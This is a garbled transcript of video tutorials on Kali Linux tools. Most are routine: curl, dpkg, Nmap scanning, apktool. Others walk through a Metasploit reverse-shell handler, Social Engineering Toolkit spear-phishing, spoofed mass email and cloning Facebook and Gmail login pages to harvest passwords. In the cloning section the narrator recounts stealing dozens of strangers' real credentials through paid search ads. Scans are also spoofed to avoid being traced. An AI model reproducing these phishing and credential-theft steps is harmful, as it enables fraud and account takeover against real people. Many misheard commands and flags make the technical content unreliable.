Thank you for watching this video. Welcome. In this video we will learn creating resource script files to familiarize with many features of world's best framework for exploitation, hacking and penetration and pen testing, that is Metasploit. There are so many features and techniques for using those features that few pen testers or hackers are aware of all of them. Many times when doing a pen test or a hack, we need to run a number of Metasploit commands repeatedly. These commands may be exactly the same each time, and just like scripting, we may need to automatically run multiple Metasploit commands in a single step. Metasploit has capability to save and store these scripts, and they can then be recalled by script name. Metasploit calls these scripts resource files. Now let's explore resource script in Metasploit. First, let's take a look at where Metasploit stores its scripts. Let's navigate to User Share Metasploit Framework and insert that script and insert that resources and then do a long listing. For that, I will type change directory, user, share, Metasploit Framework, script, resource. Now directory has been changed, so let's list the files. For that, I will type ls-l. As you can see, Metasploit has numerous scripts already developed and stored here. Any new script that we write will be stored here as well. Now writing our own resource script. Now let's create our own simple script to start a multi-hour handler necessary to receive connections such as we used in the first PowerSploit tutorial. Start Metasploit, then enter commands we want in our script. Type msf console, type exploit multi-handler, type set payload Windows interpreter /HTTP, type set el host 192.168.181.128, set el port as 444. When you have completed all of the commands we want in the script, we simply use the keyword maker followed by the name of the script. Type maker c handler_http.rc. Now simply type exploit to start our handler. Now let's check in whether it was saved or not. If we go back to the location where scripts are stored, we can see that our new script handler_http.rc is now stored with other Metasploit prepackaged scripts. So that's it in this video on creating resource script files. Thank you for watching this video. Welcome. In this video we are going to learn curl command in Linux. Transferring data from one place to another is one of the main tasks done using computers connected to a network. There are so many graphical user interface tools out there to send and receive data, but when you are working on a console only equipped with command line functionality, using curl is inevitable. A less known fact is that curl can work with a wide range of protocols and can solve most of our scripting tasks with ease. A less known fact is that curl can work with a wide range of protocols and can solve most of our scripting tasks with ease. Before getting into details of curl, use cases and examples. Let's see who is behind its development. Hacks is a team of developer consultants offering solutions to programming problems. They offer solutions in the field of embedded programming, Unix or Linux, network, device drivers, Perl script, etc. One of the co-founders of Hacks gifted the open source community with a tool called curl. The man behind its development is none other than Daniel Sternberg, who is currently a senior network engineer at Mozilla. Curl is an easy-to-use command line tool to send and receive files, and it supports almost all major protocols, that is DHCP, FILE, FTP, FTPS, and so on in use. Features can be used inside your shell script with ease, supports features like pause and resume of downloads. It has around 120 command line options for various tasks. It runs on all major operating systems. Supports cookies, forms, and SSL. Both curl command line tool and curl library are open source, so they can be used in any of your programs. It supports configuration files, multiple upload with a single command, progress bar, rate limiting, and download time details, IPv6 support. Now let's see some practical. Let's open up terminal and type curl space -h. Here you can see that different options on curl command. You can see we have lots of options here. You have to just read them to understand. Right now I will not take the pain to read almost all because you can read it by yourself. By default, curl will show you the entire output on your console. A feature of a curl is to guess the protocol based on the URL host name. Curl cannot guess the protocol, then it will default to HTTP. Type curl hacking2.com. This is our site itself only. You can see that the entire source code displayed in console. Let's copy the source code. Open the browser, search real-time HTML editor. Let's click on real-time HTML editor. Paste code in editor. Here you can see that Hacking2 website is displayed here. Let's check. Open up another browser and type URL hacking2.com. You can see that both web pages are same. Clear the console. For that, type clear. Curl command can be used to download multiple files at the same time using -option. An important fact to note here is that curl will use the same TCP connection to download multiple files. This is done to improve the download speed. Establishing TCP connection to a target server requires multiple processors. It's called as three-way handshake. To reduce the time involved in doing a three-way handshake, curl will try to use the same connection for all download from the same server issued by single command. Let's open a browser. Here I downloaded gz file. Let's copy the download link. Type -c space -o. Paste here the URL. Here you can see that download manager, download speed, total time, time left, etc. Download is completed. Let's see the file. It's in root directory. Open up directory. Here you can see that libconv 1.14 tar.gz file is downloaded successfully. That's it in this video on curl command in Linux. Thank you for watching this video. Welcome. In this video we are going to learn dpkg command in Linux. dpkg command is the main package management program in Debian and Debian based system. It is used to install, build, remove and manage packages. Aptitude is the primary front end to dpkg. Installing a package. For installing an .deb package, use a command with -i option. For example, to install an .deb package called /plugin on free 2.8.deb. Example, for that you have to write dpkg -i /plugin on free 2.8 and so .deb. Remove a package. To remove .deb package, we will specify the package name, that is /plugin on free, not the original name plugin on free 3.2.deb. The -r option is used to remove or uninstall a package. For example, dpkg -r /plugin on free. You can also use p option in place of r, which will remove the package along with the configuration file. The r option will only remove the package and not the configuration files. To remove configuration files, dpkg -p /plugin on free. To view the content of a particular package, use the -c option as shown. The command will display the contents of a .deb package in long list format. For example, dpkg -c /plugin non-free 3.2 i386.deb. Check a package is installed or not using -s option with package name. Will display whether a db package installed or not. Example, dpkg -s plugin -non-free. Install all packages from a directory. Recursively install all the regular files matching the pattern start.deb found at specified directories and all of its subdirectories. This can be used with -r and -install options For example, I will install all the .db package from directory called db packages. For example, dpkg-r-install db packages. Unpack the package but don't configure. Using the action -unpack will unpack the package, but it will not install or configure it. For example, dpkg-unpack flash plugin non-free 3.2 i386.db. Reconfigure unpacked package. The option -configure will reconfigure already unpacked package. For example, dpkg-configure flash plugin -non-free. Replace available package information. The -update avail option replace the old information with the available information in packages file. For example, dpkg-update-avail package_name. Erase existing available information of a package. The action -clear-avail will erase the current information about what packages are available. For example, dpkg-clear-avail. Forget uninstalled and unavailable package. The dpg command with the option -forget old unavail will automatically forget uninstalled and unavailable packages. Example, dpkg-forget old unavail. Let's open up the terminal and type dpkg-help. You can see that basic syntax dpkg option and command. Dpkg options are -i to install for installing application, -get selection, get list of selections, -set to set package selection from sdin, clear selection, and so on. You can see that comparison operator are lte, le, ne, ge, gd, and so on. Now let's see the list all the installed packages. To view and list all the installed packages, use the -l option along with the command. Type dpkg-l. You can see that the list of installed packages. Let's check the location of packages installed. To list location of files to be installed to your system from package name, type dpkg-l zsh. You can see that installed zsh package location. To view a specific package installed or not, use the option -l along with the package name. For example, check whether Apache 2 package installed or not. Type dpkg-l Apache 2. Here you can see that Apache 2 package is installed. Type dpkg-version. Here you can see the dpkg package version. So that's it in this video on dpkg command in Linux. Thank you for watching this video. Welcome. In this video we are going to learn JAD, which is a reverse engineering tool in Linux. JAD package is a Java compiler. Let's open up terminal and type JAD. Here you can see that the basic syntax of JAD tool, JAD's options file name, and basic options are -a generate JVM instruction as comments, -af output fully qualified names with annotating, -b generate redundant braces, -clear all prefixes including the default ones, -d directory for output files, -dead try to decompile dead parts of the code, -dis disassembler only, -f generate fully qualified names, and so on. You can see that I have created one hello world.class file. Let's decompile the given hello world Java class file. Type JAD root desktop hello world.class. Here you can see that generating hello world.jad file in root directory. Let's open up JAD file. Type cat space hello world.jad. You can see that Java codes. Let's see the web shells tool in Linux. A collection of web shells for ASP, ASPX, CFM, JSP, Perl, and PHP servers. Let's see the web shells directory. Type in the terminal ls-l user share web shells drwxr xrx to root 4096 April 12 2013 ESP, and in the same way ASPX, and so on.
So that's it in this video on JAD, which is a reverse engineering tool in Linux. Thank you for watching this video. Welcome. In this video, we are going to learn DI-Storm 3 reverse engineering Linux tool. DI-Storm is a lightweight, easy to use and fast decomposer library. DI-Storm disassembles instructions in 1632 and 64-bit modes, supported instruction sets, FPU, MMX, SSE, SSE2, SSE3, SSE4, SSE3, SSE4, 3D now, with extensions, new x86-64 instruction sets, VMX, AMD's SVM and AVX. The output of new interface of DI-Storm is a special structure that can describe any x86 instruction. This structure can be later formatted into text for display too. DI-Storm is written in C, but for rapidly use, DI-Storm also has wrappers in Python or Ruby or Java and can easily be used in C as well. It is also the fastest disassembler library. The source code is very clean, readable, portable and platform independent. Supports both little and big entity. DI-Storm solely depends on the C library, therefore it can be used in embedded or kernel modules. Note that DI-Storm is backward compatible with the interface of DI-Storm 64. However, make sure you use the newest header files. Disassemble a stacked reverse shell generated by MSF payload. Let's write the sample Python program. Type Python version 2.7.13. Let's print the welcome message. Type print welcome to curly. Here you can see that welcome message displayed here. Type I equals to 10, j equals to 20, sum equals to I plus j. Print sum. Here you can see that 30 is displayed here. DI-Storm is a lightweight, easy to use and fast decomposer library in Linux tool. So that's it in this video on DI-Storm 3 reverse engineering tool in Linux. Thank you for watching this video. Welcome. In this video we will see Linux social engineering. We'll learn about social engineering tools used in Linux. Social Engineering Toolkit usage. The Social Engineering Toolkit is an open source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allows you to make a believable attack in a fraction of time. These kind of tools use human behavior to track them to attack the vectors. Let's learn how to use the Social Engineering Toolkit. To open SET, go to Applications, click SET Social Engineering Tool. It will ask if you agree with the terms of the usage. Type Y. Most of the menus are self-explained and among them the most important is the number 1 social engineering attacks. Type 1 and enter. The submenu will open. If you press the enter button again, you will see the explanation for each submenu. The spear phishing module allows you to specially craft email messages and send them to your targeted victims with attached file format malicious payloads. For example, sending malicious PDF document, which if the victim opens, it will compromise the system. If you want to spoof your email address, be sure sendmail is installed and change config /set_config sendmail equals to off flag to sendmail equals to on. There are two options for the spear phishing attack: perform a mass email attack, create a file format payload and a social engineering template. The first one is letting SET to do everything for you. The second one is to create your own file format payload and use it in your own attack. Type 999 to go back to the main menu and then type 2 to go to the web attack vectors. The web attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim. This module is used by performing phishing attacks against the victim if they click the link. There is a wide variety of attacks that can occur once they click a link. Type 99 to return to the main menu and then type 3. The infectious USB or CD or DVD module
will create an autorun.inf file and a Metasploit payload. The payload and autorun file is burned or copied on a USB. When DVD, USB or CD is inserted in victim's machine, it will trigger an autorun feature. If autorun is enabled and hopefully compromise the system, you can pick the attack vector you wish to use, file format bugs or straight executable. Following are the options for infectious media generator, file format exploit, standard Metasploit executable. Type 99 to go back to the main menu, then type 4 to go to the web attack vectors. Create payload and listener is a simple way to create a Metasploit payload. It will export the exe file for you and generate a listener. You will need to convince the victim to download the exe file and execute it to get the shell. Type 99 to go back to the main menu and then type 5 to go to the web attack vectors. The mass mailer attack will allow you to send multiple emails to the victims and customize the message. There are two options on the mass emailer. The first is to send an email to a single email address. The second option allows you to import a list that has all recipient emails and it will send your message to as many people as you want within that list. Email attack single email address, email attack mass mailer. Type 99 to go back to the main menu, then type 9 to go to PowerShell attack vector. The PowerShell attack vector module allows you to create PowerShell specific attacks. These attacks allow you to use PowerShell, which is available by default in all operating systems, Windows Vista and above. The PowerShell attack vector module allows you to create PowerShell specific attacks. These attacks allow you to use PowerShell, which is available by default in all operating systems from Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventive technologies. PowerShell alphanumeric shellcode injector, PowerShell reverse shell, PowerShell bind shell, PowerShell dump SAM database. Welcome, in this video we are going to learn how to do email attack in social engineering tool. In this video, I will demonstrate single email attack. Here attacker send fake email to the victim email. By doing this, attacker can easily send. In this way, one can easily send phishing link to the victim via his or her email address to get his or her credentials. So in this video, we will do single email. In next video, we will do mass email. So let me first open up terminal and type SE toolkit. You can see toolkit is opened. Here I have some modules of tool. Now I will select the module 1 for social engineering attack. So here I am doing single email attack. So I will go for 5, that is mass mailer attack, which contains a sub-module called single email attack. So you can see here the first option, single mail attacker. So I will go for 1. Next we need to enter victim email address. So I will do on one of my fake Gmail address. That is, I will copy the address and paste in place of the target here. Next we need to select any one option. Here I'm using my own Gmail account to do this attack. Now I will enter Gmail account. Next we need to give the from name, that is Rajkumar. Here I'm giving. Now next we'll enter the password. It's asking for flag this message high priority. I will type no. Now I'm attaching a file to send the victim. I will press Y. I will give a path to that file which you want to send. Here I am sending a text file which is on desktop. The path is root/desktop/email.txt. Now I will enter the subject of email here. I am giving name salary. You can give whatever name you want. I'm just giving random subject here. And in this email.txt there is nothing in that. just 2 email IDs. You can write anything you want. I'm just demonstrating you that we can do attachments also. I will enter the message which you want to send to the victim. Next, type end to send the email. Now let's check whether our victim got email or not. You can see in inbox the message is received. You can also see text file which attacker has sent. Instead of this, attacker can also send his or her phishing link. Anyway, I have showed this feature because it is in SE Toolkit, that is Social Engineering Toolkit. In next video, I will show you how to send email to multiple list of email. So that's it in this video. Thank you for watching this video. Welcome. In this video, we will see mass mailer attacker. In previous video, we have already seen how to send email to single email. In this video, we will see for mass email, that is for the list of email IDs. So before we begin, I would like to inform you that you can use this tool to send phishing link, or you can even use to send the payload, that is Metasploit payload, to the victim. If you have no idea about Metasploit payload, then do watch this video completely, where I have discussed creating different kind of payloads in Metasploit, in Social Engineering Toolkit, in Fat Rat, and many more tools. So let's begin. Now here I am selecting option 2 for email attack mass mailer. Now we need to create a text file and add all the target emails here. I have added same email address to show the demo. You can add 10 different email ID or more here. So I don't have that much number of email IDs to show now. So I'm just repeating the same email ID here. Now next we need to give the path of that text file, that is a list of email, that is root/desktop email.txt. Now here I'm using my own email to send the email. So next we need to enter our email address. So next I will type from name. So here I'm using my own name, Amit Hudar. Now I have to enter email password. Now we need to set flag to this as a high priority. I don't want to set, so I will type no. Next it's asking about attaching any file. I don't want to attach any file. Now it's asking for subject. I will type a random subject, that is salary. Now I will type P to send message as a plain. Now next we have to type the message here. I will type hello sir, and at the end of the message I will type end. Here you can see the mail is sent. Now let's check whether the mail is received or not. You can see I got 2 mails in the inbox because I had repeated same email ID in the list. You can add 10 different email IDs to send to 10 different emails. So that's it on mass mailer attacker in Social Engineering Toolkit. Thank you for watching this video. Welcome. In this video we will see website cloning in Social Engineering tools. So basically, before we begin, you have to understand what is website cloning. So basically, cloning stands for creating the replica of the original one, like they do cloning of animals or cloning of some expensive things. So here we are going to see about website cloning. Why we are going to do website cloning is so that it helps in hacking. Like if you create the replica of Facebook, then you can trick anyone
to enter their user ID and password into the cloned website. So basically in this video I will show you how to clone a website. So let's start. First open a terminal and type SE toolkit to start the social engineering tool. Here you can see it started. Here you can see the modules of the toolkit. Now we are doing social engineering attacks. So selecting a module 1. Here you can see some module of social engineering attacks. As we are doing website cloning, so I will select 2, that is website attack. Now selecting credential harvest attack. Now selecting credential harvest attack method, that is 3, to clone the website. So here I am selecting the site cloner 2. Now we need to enter the IP address. So I am entering my own IP address, that is 192.168.0.11. You'll get your IP. If you don't know how to get your IP, then you can get it by just typing ifconfig in the terminal. Here you can see the IP. Just copy it and paste it in the place of target IP. Now enter the website name, which website you want to clone. Here I want to clone the Facebook website, so I will type www.facebook.com. Now here you can see the website is cloning. Now it's ready for the attack. If the victim open this link, you can see the clone website is opened. So if you type your own email ID and password and hit enter, you can see here in backend terminal your email ID and password is captured. Basically what we did here is we created clone of facebook.com and hosted on my own local IP address only, that is 192.168 so and so. So by using this social engineering toolkit, we have just cloned Facebook website and hosted on our own computer, or you can say we did it locally. If you even send this link, that is 192.168, to anyone, if they just open this link or this ID, then this cloned website will load up. Whatever user and password they will enter here, you'll get back in terminal. You can send this link in an email so that victim open it up. You can send this link to victim in the Facebook or WhatsApp or email. If they just open it up, they will believe that it's Facebook itself only and they will type user and password. I have did it myself many times. Like once what I did was I have used Google AdWords. In that what I did is I hosted this cloned website on one website itself only. That is another method where we had created the clone website in the HTML format. What I did is, what the URL was, I added it in Google AdSense, or you can say Google AdWords, so that whoever types Facebook in Google, the first Facebook link which used to appear was mine, that is a cloned website which I had set up for particular location only. So within a night I got like some 30 to 40 user ID password of the people of whom I didn't knew, but they belong to that location. What mistake they did was they searched on Google as a Facebook and they opened the first link which was mine, which I had tricked and added into the Google result on the top by paying to Google through Google AdWords. So by clicking that first link, they came to my cloned website and they entered their user ID and password. So if you ask me, after entering user ID and password and hit login, what will happen? What will happen is you'll get a blank screen. Nothing happens. That is another process where you can show error after hitting login to make it look authentical, to make it authenticate, to make it look real. So that's all. So this was pretty much simple, where I just created within a few minutes the cloned website and hosted on my own system only. If you're really interested on what I did using Google AdWords, how to do this and all, like how I integrated into Google search and all to get user and password of unknown people who came through Google, then go through my course. I think I did this thing in A to Z ethical hacking course, or else I have did it in another course, that is ethical password hacking and protecting. I think I have most probably done it in A to Z ethical hacking course itself only. Just to check in curriculum, you will get Google AdWords thing and all in the curriculum itself only. Just check the curriculum before taking the course. You will get Google AdWords mentioned in curriculum itself only. So that's it in website cloning in social engineering tools. Thank you for watching this video. Welcome. In this video we will see finding open ports. With the knowledge of victim's network range and active machines, we'll proceed with the port scanning process to retrieve the open TCP and UDP ports and access points. Let's begin the process of finding the open ports by opening a terminal window. To begin, launch a terminal window and enter the command 192.168.56.101. This is basically localhost IP of my computer. If you want to obtain yours, just type ifconfig in terminal to obtain this IP address. First, I am checking open ports of my own system. Starting Nmap, it takes some minutes, just wait for it. But I'm just fast forwarding this video to show you the results. Nmap is done for one IP address, one host. We got just one port, that is ETTCP open service type HTTP. Now let's try with google.com instead of our machine. For that I will type nmap google.com. Starting Nmap, I'll just fast forward this video to get the result. So Nmap is done. We got two open ports, that is HTTP and HTTPS for google.com. You can also explicitly specify the ports to scan. In this case, I am specifying just 1000 ports, that is nmap-p 1 to 1000 192.168.56.101. It's starting. Basically, it doesn't make sense here to limit it to the 1000 because for localhost we just have one port to check. Anyhow, I just wanted to show you that when you are going to scan for some website or anything, you can limit scanning to particular number of ports. Anyway, it doesn't make sense here because localhost has just one open port. If there are tens of thousands, like for PayPal and all, you will get tons of them. There you can limit the number of ports to scan, or specify Nmap to scan all the organization network on TCP port 80. For that, you have to just write it differently, that is nmap-p port 80 for that 80 192.168.56. Now it's just going for TCP 80, that is to scan all the organization network on TCP port 80. The result says 256 IP address, 256 host up, scanned in 71 seconds. Now we have to get output of the result, as we are getting all the outputs here in terminal. When we close the terminal, the information we got, that is the output result we got, will be deleted. So let's see how to get output and save it. For that, I'm going to type nmap-p 80, that is for port 80, 192.168.10. Mention like this the location of the file, that is, I'm specifying to root desktop nmap target host tcp445.txt. You can see the txt file has appeared here after pressing enter. On desktop, whatever the result we get here will be stored in this txt format. I'm just fast forwarding this video to get the output. Nmap is done for 256 IP address. Here, let me show the text file. You can observe all the output result is stored in this txt file. So that's all about Nmap, that is finding open ports using Nmap. Thank you for watching this video. Welcome. In this video we will see domain scan with Fierce. Fierce is not an IP scanner, it is not a DDoS tool, it is not designed to scan the whole internet or perform any untargeted attacks. It is meant specifically to locate likely target both inside and outside corporate network. Only those targets are listed. No exploitation is found unless you do something intentionally malicious with the connect switch. Fierce is a reconnaissance tool. Fierce is a Perl script that quickly scans domains using several tactics. To perform a domain scan with Fierce tool that tries multiple techniques to find all IP addresses and host name used by a target. Now let's start on practical part. Open a terminal and change directory to user bin, that is cd user/bin. Directory is changed. Now type Welcome. In this video we will see how to perform a fast scan. The -F option instructs Nmap to perform a scan of only 100 most commonly used ports. The Nmap scans top 1000 commonly used ports by default. After using -F option, it reduces that number to 100. This can dramatically speed up scanning while still representing the majority of commonly used ports. So let's begin. First, I will open a terminal and type nmap space -f scanme.nmap.org. So here I am performing a fast scan on one of Nmap website where it scans only 100 common used ports. You can see we got the output. It took total 10 seconds to scan scanme.nmap.org. Now next I'm going to scan one of my local machine. You can see the scanning is completed. As you can see, it took only 2 seconds to scan the host. So that's how you can perform fast scanning in Nmap. Thank you for watching this video. Welcome. In this video we will see scan all ports.
The "-p star option is a wildcard used to scan all 65 TCP and 535 IP ports on specified target. So let's see how to scan all ports in target host. I'll open a terminal and type nmap space -p space in double quotation star 192.168.1.1. I'll hit enter to start scanning. As you can see, port scanning started. It will take some time. We got the result. Only 5 ports are open and 1 port is filtered and 4248 ports are closed. So that's how you can perform scanning on all ports. That's it in this video. Thank you for watching the video. Welcome. In this video we are going to see how to scan our target machine by spoofing MAC address. The --spoof-MAC is used to spoof the MAC address of an Ethernet device. Here Nmap is instructed to forge a randomly generated MAC address. This makes our scanning activity harder to trace by preventing your MAC address from being logged on the target system. So let's begin. In the terminal, I will type sudo space nmap -ss -spoof -mac d-link -d 192.168.0.5 192.168.56. Here I am scanning on my own PC, so if you want the IP of your own PC, open a new terminal and type ipconfig. So this is our target IP. Now in terminal 192.168.0.8, here I am using 2 decoy address and giving one system name which will show to the victim. You can see here in the top, like after -d, these are the 2 decoy address. Now to see this scanning in detail, we need to open Wireshark. In terminal, I will type Wireshark. Now I will select interface and start the Wireshark tool. As you can see, it's ready to capture packets. I will hit enter to scan. As you can see, scanning is started and it's showing spoofed MAC address and the name of the system. Let's see in the Wireshark tool, you can see the source address which we had given in decoy. Decoy means basically spoofing of address. Now we'll select any packet and see the source MAC address. As you can see, MAC address is spoofed. So that's it in this video on spoof MAC address. Thank you for watching this video. Welcome. In this video we are going to learn Nmap stealth scanning in Linux. To use Nmap to perform a TCP stealth scan, you will need to have a remote system that is running accessible network services or TCP. As with the most scanning requirements, Nmap has an option that simplifies and streamlines the process of to perform TCP stealth scan with Nmap. The -ss option should be used with the IP address of the host that is to be scanned. Let's open up terminal and type nmap -s capital S 216.58.197.46. Here you can see that stealth scan is successful. Port 80 and 443, state open, services HTTP and HTTPS. Let's scan with port address 2180443. Type nmap -ss 216.58.197.46 -p. Port 21, 80 and 443. 21 is filtered and service type FTP. The rest are HTTP and HTTPS which are open. So that's it in this video. Thank you for watching this video.
Welcome, in this video we will see zombie scanning with Nmap. Nmap is TCP port scan method used to send a spoofed source address to a computer to find out what services are available and offers blind scanning of a remote host. This is accomplished by impersonating another computer. No packet is sent from own IP address, instead another host used, called as zombie. Zombie scans can also be performed with an option in Nmap. However, prior to using the Nmap zombie scan, we can quickly find any viable zombie candidates by sweeping an entire address range and assessing the IP ID sequencing patterns with Metasploit. To do this, we need to open Metasploit with the MSF console command and then select the IP ID sequencing auxiliary module. Let's start open Metasploit. This auxiliary module can be used to perform a scan on a sequential series of host addresses or on a network range as defined by the CIDR notation. For the speed of the scan to be increased, the threads variable should be increased to the desired number of concurrent tasks. Type use auxiliary scanner IP ID sequence and enter. Type info for information. Here we see name IP ID sequence scanner module, auxiliary scanner IP ID sequence, license Metasploit framework license, rank normal provided by Grace. Basic options: interface, R host, R port, snaplan, and so on. This auxiliary module can be used to perform a scan on sequential series of host addresses or on a network range as defined by the CIDR notation. For the speed of the scan to be increased, the threads variable should be increased to the desired number of concurrent tasks. Type set R host 107.180.5424. Set threads 25. Show options. The name concurrent settings require descriptions. These are the row. Insert that interface. In name interfaced R host identifier, R port, snaplan, and their current settings, and they are required, and a description for them. That is interface. Required know the name of the interface, R host 172.16 and so. Required as the target address range or CIDR. R port current setting 80. Required as the target port. Snaplan 65535. Required as the number of bytes to capture. Threads current setting 25. Required as the number of concurrent threads, and timeout. Once the desired value for the required variables have been populated, we can verify the configuration of the scan again using the show options command. The IP ID sequence can then be executed using the run command. Type run. Here you can see it started. So that's it in this video on zombie scanning with Nmap. Thank you for watching this video. Welcome, in this video we will see service fingerprinting and operating system fingerprinting. First we will see operating system fingerprinting. At this point of information gathering process, we should now have documented a list of IP addresses, active machines, and open ports identified from the target organization. The next step in the process is determining the running operating system of active machines in order to know the type of system we are pen testing. Let's open up the terminal. Using Nmap, we issue Nmap with -o option to enable the OS detection feature. Let's see the IP address. Open up command prompt as administrator and type ipconfig/all. Here we see the IP configuration information. This PC IP address is 192.168.1541.1. Let's type this IP address in terminal. that is nmap-o192.168. Here you can see that all the information of this IP address displayed here. Here you can see the open ports and services and their states, that is MSRPC, NetBIOS, and so on, and running operating system Windows 7, and still lots of information. Now let's see service fingerprinting. Determining the services running on specific ports will ensure a successful pen test on the target network. It will also remove any doubts left resulting from OS fingerprinting process. Now let's type in terminal nmap-sv192.168 and so. You can see that all services running on specific ports. Using Nmap, we can also identify the application running on a specific port or range of ports. For that, type Nmap-bq 192.168.so and 1 to 100. I'm just limiting it to try from 1 to 100 ports. After hitting enter, some will connect. For that, it will show disconnect, and some may not. For this, you will get warning message, and it will show for which one it didn't connect. It is from some out of the 32 it didn't connect, then again disconnect. Again from 33 to 64 didn't connect, and so on. Let me fast forward this video as it takes few minutes. The process is done. Now you know which port connected from 1 to 100 and which didn't connect. So that's all in this video on operating system fingerprinting and service fingerprinting. Thank you for watching this video.
Welcome. In this video we are going to see how to discover the host status using ARP ping. Ping scans are used by penetration tester and system administrator to determine if the hosts are online. ARP ping scans are the most effective way of detecting hosts in the LAN network. Nmap really shines by using its own algorithm to optimize this scanning technique. Open the terminal and type nmap-sp-pr 192.168.1.124. Here I am checking the up host in my network. The arguments -sp -pr 192.168.1.124 make Nmap initiate an ARP ping scan of all if the 256 IPs say IDR24 in this private network. ARP ping scanning works in a pretty simple way. ARP requests are sent to the target. The host responds with an ARP reply. It is pretty clear it's online. So here we got the result. As you can see, there are 5 hosts up. Now let's check one of the hosts in network and observing the operation how it's gonna work. Here I'm using packet trace, where I can see packet transmission between the source and destination. So we'll type nmap space -sp -pr -packet -trace 192.168.1.101. Here you can see the packet transmission between the source and destination. You can see we got the response from the target IP. So that's how you can check the status of the host using ARP ping. So that's it in this video. Thank you for watching this video. Welcome. In this video we are going to see how to trace the network path to the specified host. So let's begin. I'll open up terminal and type sudo space nmap -- traceroute stats array 2s yahoo.com. In this command --traceroute, which is used to trace route, and --states array 2s. By using this command, we will get the status of scanning every 2 seconds. And last, we are given the website name. So let's start the scanning. Here you can see the scanning is started.
It will take some time. As you can see, we got the result. Here you can see port 80 and 443 is open now, and below you can see trace where our packets have traveled throughout the address to reach our target website. As you can see, the first one, our router IP address, because our request first passed through our router. Total, we got 3 routers to reach yahoo.com address. So that's how you can trace the network path to the specified host. Thank you for watching this video. Welcome. In this video, we're going to see how to use Nmap graphical user interface to scan the network or host. The graphical user interface version of Nmap is Nmap, so basically we will do scanning on Nmap. So let's start. Now to open Nmap tool, go to application and type Nmap in search engine. Here you can see the Nmap as a root. Now open this. Here you can see now it's opened. Now let's do the normal ping scan on our network. So type in target box 192.168.0.1/24. Now select the ping option. Here you can see ping scanning is started. Here you can see the list of up hosts in our network. Now let's do the regular scan. So select regular scan option. Here you can see scanning is completed. As you can see the open ports of the host. Here you see the list of hosts. Now select any host to see the open ports. You can also see the topology where you will see the present hosts. You can also have the host details where you can see how many ports are closed and how many ports are open. Now next I am going to see trace route. So here I am taking one website. I am not mentioning the website name and I am blurring it because it's a real website. I don't want to create any trouble to that website. I just took one random website and I've selected trace route option. Here you can see trace route totally took 3 hosts to reach the website. Here you can see the route of this. So that's how you can use graphical user interface of Nmap, that is Nmap. So that's it in this video. Thank you for watching this video. Welcome. In this video we are going to learn how to create your own profile in Nmap. So let's begin. Here user create own profile to scan the network or host. Let's go to Nmap application. Select profile and select profile editor. Here you can see some parameters are automatically selected. You can change and make them according to yourself. Next, give the name for your profile. Next, select which type of scanning you want to perform using your profile. Here I am creating a profile which scans on target 192.168.0.4 and selecting TCP scan as TCP connect scan, and at last selecting timing template to -T4. You can also add other parameter like ping scripting and other option, and at last click on save changes. Now the profile is ready. So to select your profile, go to profile and select profile, what name you have given, and click on scan. You can see the scanning is started. It will take some time. Here is a result. So that's how you can create your own profile in Nmap. So that's it in this video. Thank you for watching this video. Welcome. In this video we will see APK tool package in Linux. APK tool is one of the best tools to reverse the whole Android application. It can decode resources to nearly an original form and rebuild them after making modifications. It is a tool for reverse engineering third-party closed binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications. It makes possible to debug small code step by step. Also, it makes working with app easier because of project like file structure and automation of some repetitive tasks like building APK, etc. It is not intended for piracy and other illegal uses. It could be used for localizing, adding some features or support for custom platform and other good purposes. Just try to be fair with authors of an app that you use and probably like. Features: decoding resources to nearly original form and rebuilding them. Smally debugging helping with some repetitive task. To open it, go to terminal and write apk tool. Basic usage: apk tool command. Options are -s, -no src, do not decode sources, -r, do not decode resources, -d, debug, decode in debug mode, check project page for more info, and so on. Use debug mode to decode the given apk file. Type apk tool d root desktop google.apk. Here I already decode google.apk. Let's change the name of apk file as hacking.apk. Debug mode D to decode the given apk file. So let's type apk tool D root desktop hacking.apk. You see that backsmelling started decoding the values XML and done. You can see that apk tool is decode resources of hacking.apk tool. So that's it in this video on apk tool package in Linux. Thank you for watching this video. Welcome. In this video we are going to learn Linux convert image to ASCII using JP2A converts JPEG images to ASCII. Let's open up terminal, install JP2A tool. For JPG to ASCII converter, type apt-get install jp2a. Here you can see that installation is started here. jp2a installation is done. Note that jp2a converts only JPG to ASCII. Let's download JPG file from Google. Open a browser, type Linux images. Here you can see that image. Let's save it on desktop as kali.jpg. Back to terminal, type jp2a root desktop kali.jpg. Here you can see that Kali image ASCII code. Let's download Google image. Type jp2a root desktop google.jpg. You can see that Google logo in ASCII code. So that's it in this video on Linux convert image to ASCII code. Thank you for watching this video. Welcome. In this video we will see how to set up phishing page using Linux by writing simple commands. In this video we will create phishing page of Facebook. First, boot into Linux. To boot into Linux, just plug in your bootable Linux pen drive, press F12 or other button. As your laptop shows to choose boot option while booting system, choose pen drive you have inserted. During boot process, Linux will prompt you to choose boot mode. Select live option, which is first option, and press enter. Eventually, Kali will boot into graphical interface mode. Go to application, then Linux, exploitation tools, social engineering toolkit, and click on social engineering toolkit. From menu, select first option, that is social engineering attacks, and hit enter. Now in this menu, select second option, that is website attack vectors. Now select third option, that is credential harvester attack method. Now select second option, site cloner. Now you have to enter your system address. As of my system IP address is 192.168.2.2. To get your system IP address, open terminal and type ifconfig. As you can see, this is my IP address. Just copy your IP address from here and paste it in before terminal and hit enter. It is asking for URL to be cloned. As I want to clone Facebook login page, I will write www.facebook.com. and press enter. It says that information will be displayed to you as it arrives below. Now our fishnet is ready. I'll just open up the browser and type the IP address which I had given before, that is 192.168.2.2. Our cloned Facebook page shows up. If user enters email ID and password and hit on login, here in our terminal we get his user ID and password. So in the same way I did for Gmail, that is gmail.com. This way of creating phishing page is one of the most easiest one you can find. But the disadvantage is as soon you turn off your Kali system, the clone website will be also gone. And you need to have good internet speed and constant connection. If the internet connection is gone, your page is gone. And this page can't even handle a number of visitors. The bandwidth of phishing page directly depends upon your internet speed. So that's all in creating phishing page using Kali Linux. Thank you for watching this video.
